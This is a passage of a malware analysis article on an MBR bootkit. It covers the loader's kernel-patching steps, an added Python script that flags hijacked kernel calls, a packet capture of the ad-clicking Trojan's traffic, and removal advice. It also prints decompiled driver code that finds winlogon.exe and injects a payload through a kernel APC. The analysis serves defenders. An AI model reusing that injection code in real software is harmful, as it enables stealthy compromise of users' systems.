• Restores the original nt!IoInitSystem() call in the code of the nt!Phase1Initialization() function.

• Calls nt!IoInitSystem() with a repeated transfer of control to the driver loader via a replaced return address on the stack.

• Searches for the OS kernel load address by the first vector in the interrupt table. The address of this table is obtained with the sidt instruction.

• Searches by signature for the address of the kernel global variable nt!PsLoadedModuleList, the list of loaded kernel mode modules. Specifically, the nt!PsLoadedModuleList address is obtained from a pointer to this variable in the code of the unexported nt!IopWriteDriverList() function.

• Looks up the addresses of the following exported functions and kernel variables by their name hashes: ExAllocatePool, ExFreePool, KeLoaderBlock, NtClose, NtCreateFile, NtReadFile.

• Reads the kernel mode driver from the unlabeled area at the end of the disk.

• Sets up an executable driver image and transfers control to its entry point.

• Returns control to nt!Phase1Initialization().
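An added example (not from the article) covering the two in-kernel patches described on this page, the nt!PspCreateProcess() call redirected into the kernel's .data section and the nt!IoInitSystem() call in nt!Phase1Initialization() redirected past the end of the kernel image: it decodes the E8 rel32 call bytes from the kd listings and reports where each target lands, which is the check a memory-forensics script would run over patched call sites. The kernel base and every section except .data (whose values come from the !dh dump above) are constructed assumptions.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000

KERNEL_BASE = 0x804D7000  # assumed load address for the example
# Section table relative to KERNEL_BASE. Only .data repeats the !dh dump on this page.
SECTIONS = [
    {"name": ".text", "va": 0x00001000, "size": 0x6D800, "flags": 0x68000020},  # constructed
    {"name": ".data", "va": 0x0006E800, "size": 0x1EEA0, "flags": 0xC8000040},  # from the dump
    {"name": "PAGE",  "va": 0x000A0000, "size": 0xC0000, "flags": 0x60000020},  # constructed
    {"name": "INIT",  "va": 0x001C0000, "size": 0x40000, "flags": 0xE2000020},  # constructed
]


def decode_call(insn: bytes, insn_va: int) -> int:
    """Target of a near relative CALL: opcode E8h, rel32 relative to the next instruction."""
    if len(insn) < 5 or insn[0] != 0xE8:
        raise ValueError("not an E8 rel32 call")
    rel = struct.unpack_from("<i", insn, 1)[0]
    return (insn_va + 5 + rel) & 0xFFFFFFFF


def section_of(target_va: int):
    """Section header containing the target, or None when it is outside the image."""
    rva = target_va - KERNEL_BASE
    for s in SECTIONS:
        if s["va"] <= rva < s["va"] + s["size"]:
            return s
    return None


def classify_target(target_va: int) -> str:
    """'ok': an executable section of the kernel image.
    'data-section': inside the image but in a section without
    IMAGE_SCN_MEM_EXECUTE (the loader injected into .data).
    'outside-image': not inside the kernel image at all (the loader
    copied into memory right after the kernel)."""
    sec = section_of(target_va)
    if sec is None:
        return "outside-image"
    if sec["flags"] & IMAGE_SCN_MEM_EXECUTE:
        return "ok"
    return "data-section"


def classify_call(insn: bytes, insn_va: int) -> str:
    return classify_target(decode_call(insn, insn_va))


# Instruction bytes and addresses as shown in the kd listings on this page; for the
# nt!Phase1Initialization patch the listing's resolved call target is used directly.
CASES = {
    "PspCreateProcess before":    ("call", bytes.fromhex("e81bb3f6ff"), 0x805D0870),
    "PspCreateProcess after":     ("call", bytes.fromhex("e88af8f7ff"), 0x805C6A96),
    "Phase1Initialization after": ("target", None, 0x80ECF80E),
}


def audit_cases() -> dict:
    """Classification of every call site in CASES, keyed by name."""
    verdicts = {}
    for name, (kind, insn, va) in CASES.items():
        verdicts[name] = classify_call(insn, va) if kind == "call" else classify_target(va)
    return verdicts


if __name__ == "__main__":
    for name, verdict in audit_cases().items():
        print(f"{name}: {verdict}")
```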
Driver and payload

The bootkit's driver is used for the injection of user-mode code into the winlogon.exe process. For this purpose it creates a system thread which polls the process list in a loop, walking the doubly-linked lists of the kernel's _EPROCESS structures and looking for the required process by the name of its executable file.

The offsets of the required fields of the _EPROCESS and _ETHREAD structures are stored in global variables whose values are initialized according to the version of the operating system kernel. The kernel version can be obtained with the PsGetVersion/RtlGetVersion functions.

Below is the pseudocode of the function which searches for the process by name.

After getting the pointers to the necessary process and one of its valid threads, the kernel mode driver reads the Trojan's user mode code from the unlabeled area of the disk and injects it into the winlogon.exe process.









// function, which searches process by name (returns pointers to _EPROCESS and _ETHREAD)
signed int __stdcall sub_113EC(const char *ProcessName, int a2, int a3)
{
  int ProcessEntry;          // esi@1
  PEPROCESS CurrentProcess;  // eax@1
  int ThreadListStart;       // edi@5
  int ThreadEntry;           // esi@5
  int Thread;                // eax@9
  unsigned int Teb;          // eax@12
  int ProcessListStart;      // [sp+18h] [bp+Ch]@1

  *(_DWORD *)a2 = 0;
  *(_DWORD *)a3 = 0;

  // gets pointer to a list of active processes from _EPROCESS structure of current process
  CurrentProcess = IoGetCurrentProcess();
  ProcessEntry = (int)((char *)CurrentProcess + EPROCESS_ActiveProcessLinks);
  ProcessListStart = (int)((char *)CurrentProcess + EPROCESS_ActiveProcessLinks);

  // lists all active processes and searches necessary executable file by name
  while ( !*(_BYTE *)(ProcessEntry + EPROCESS_ImageFileName) ||
          stricmp(ProcessName, (const char *)(ProcessEntry + EPROCESS_ImageFileName)) )
  {
    ProcessEntry = *(_DWORD *)ProcessEntry;
    if ( ProcessListStart == ProcessEntry )
      // last record in a list (necessary process is not found)
      goto LABEL_7;
  }
  *(_DWORD *)a2 = ProcessEntry - EPROCESS_ActiveProcessLinks;

LABEL_7:
  if ( *(_DWORD *)a2 )
  {
    // gets a pointer to the list of threads of found process
    ThreadEntry = *(_DWORD *)(EPROCESS_ThreadListHead + ProcessEntry);
    ThreadListStart = ThreadEntry;

    // lists all process threads
    do
    {
      Thread = ThreadEntry - ETHREAD_ThreadListEntry;
      *(_DWORD *)a3 = ThreadEntry - ETHREAD_ThreadListEntry;
      if ( byte_136C0 )
      {
        // checks integrity of thread environment block (_TEB)
        Teb = *(_DWORD *)(Thread + 0x20);
        if ( Teb && Teb < (unsigned int)MmSystemRangeStart )
          return 1;
      }
      else
      {
        // thread should be system thread
        if ( !PsIsSystemThread(Thread) )
          return 1;
      }
      ThreadEntry = *(_DWORD *)ThreadEntry;
    }
    while ( ThreadEntry != ThreadListStart );
  }
  return 0;
}
signed int __stdcall sub_114B2(int Thread, int Process)
{
  signed int result;       // eax@2
  char Apc;                // [sp+4h] [bp-68h]@5
  char ApcState;           // [sp+34h] [bp-38h]@7
  LARGE_INTEGER Timeout;   // [sp+4Ch] [bp-20h]@9
  int v7;                  // [sp+54h] [bp-18h]@5
  void *Payload;           // [sp+58h] [bp-14h]@4
  ULONG AllocationSize;    // [sp+5Ch] [bp-10h]@4
  PVOID BaseAddress;       // [sp+60h] [bp-Ch]@1
  HANDLE EventHandle;      // [sp+64h] [bp-8h]@1
  HANDLE Handle;           // [sp+68h] [bp-4h]@1

  BaseAddress = 0;
  EventHandle = 0;
  Handle = 0;

  // gets process descriptor by pointer to _EPROCESS
  if ( ObOpenObjectByPointer(Process, 512, 0, 0, PsProcessType, 0, &Handle) < 0 )
    return 0;

  if ( byte_13709 == 1 )
  {
    // reads user-mode code from disk
    if ( sub_11ACE(FileHandle, dword_136CC, &byte_1370A, (int)&Payload, (int)&AllocationSize) != 2 )
    {
      ZwClose(Handle);
      return 0;
    }
  }
  else
  {
    AllocationSize = 1700;
    Payload = &unk_13000;
  }
  v7 = 0x2AEu;

  // allocates virtual memory in process' address space
  if ( ZwAllocateVirtualMemory(Handle, &BaseAddress, 0, &AllocationSize, 4096u, 64u) < 0 ||
       ZwAllocateVirtualMemory(Handle, &BaseAddress, 0, (PULONG)&v7, 0x1000u, 64u) < 0 )
  {
    ZwClose(Handle);
    result = 0;
  }
  else
  {
    ZwClose(Handle);

    // connects to address space of target process
    KeStackAttachProcess(Process, &ApcState);

    if ( ZwCreateEvent(&EventHandle, 0x1F0003u, 0, SynchronizationEvent, 0) >= 0 )
    {
      dword_13704 = (int)EventHandle;
      dword_13B0E = 0;
      dword_1392A = 0;
      dword_1392E = 0;

      memcpy(BaseAddress, Payload, AllocationSize);
      memcpy(BaseAddress, &unk_13700, 0x24Cu);
      *((_WORD *)BaseAddress + 294) = *((_WORD *)&unk_13700 + 294);

      // initializes APC for current thread of target process
      KeInitializeApc(&Apc, Thread, 2, sub_11498, 0, BaseAddress, 1, 0);

      // launches APC and executes injected code
      if ( (unsigned __int8)KeInsertQueueApc(&Apc, 0, 0, 0) )
      {
        // sets KTHREAD::ApcState.UserApcPending to true
        *(_BYTE *)(KTHREAD_ApcState + Thread + 0x16) = 1;
        Timeout.HighPart = -1;
        Timeout.LowPart = -300000000;

        // waits for APC completion
        ZwWaitForSingleObject(EventHandle, 0, &Timeout);
      }
    }

    // disconnects from address space of target process
    KeUnstackDetachProcess(&ApcState);

    if ( EventHandle )
      ZwClose(EventHandle);

    result = 1;
  }
  return result;
}
The user mode code launches the Trojan process with the payload. The corresponding module is stored in the file C:\System Volume Information\Microsoft\services.exe, which is created by the installer at the bootkit's installation.

In turn, the Trojan process works like a "clicker": it requests configuration information from the weathertalkz.com website and then performs multiple jumps to ad banners in an Internet Explorer process within a hidden window.



Destination       Protocol   Info
178.17.162.242    HTTP       GET /banner3.php?q=5011.5011.2000.0.0.4fac4dc372 ...
178.17.162.242    HTTP       GET /banner2.php?q=5011.5011.2000.0.0.4fac4dc372 ...
192.168.88.148    HTTP       HTTP/1.0 200 OK (application/octet-stream)
85.17.211.165     HTTP       GET /banner.php?aff_id=10682 HTTP/1.1
192.168.88.148    HTTP       HTTP/1.1 404 Not Found (text/html)
69.50.192.52      HTTP       GET /index.php?aff_id=24080 HTTP/1.1
192.168.88.148    HTTP       HTTP/1.1 200 OK (text/html)

Figure 14. Requests for configuration information from weathertalkz.com.



Conclusion 

The increased development of malicious 
bootkits seems to point to the fact that mal- 
ware developers are coming to the end of the 
road when it comes to traditional methods of 
malicious code startup. The MBR infecting 
technique is still badly handled by antivirus 
software, and is thus extremely attractive to 
malware developers. 



The good news is that the current bootkits that can be found in the wild are quite limited when it comes to their self-protection capabilities. It means that a typical malicious bootkit can still be removed by simply restoring the original MBR. This can be achieved by using the standard Microsoft tool 'fixmbr' or, alternatively, 'Bootkit Remover', which can also detect changed or hidden MBR code and dump it.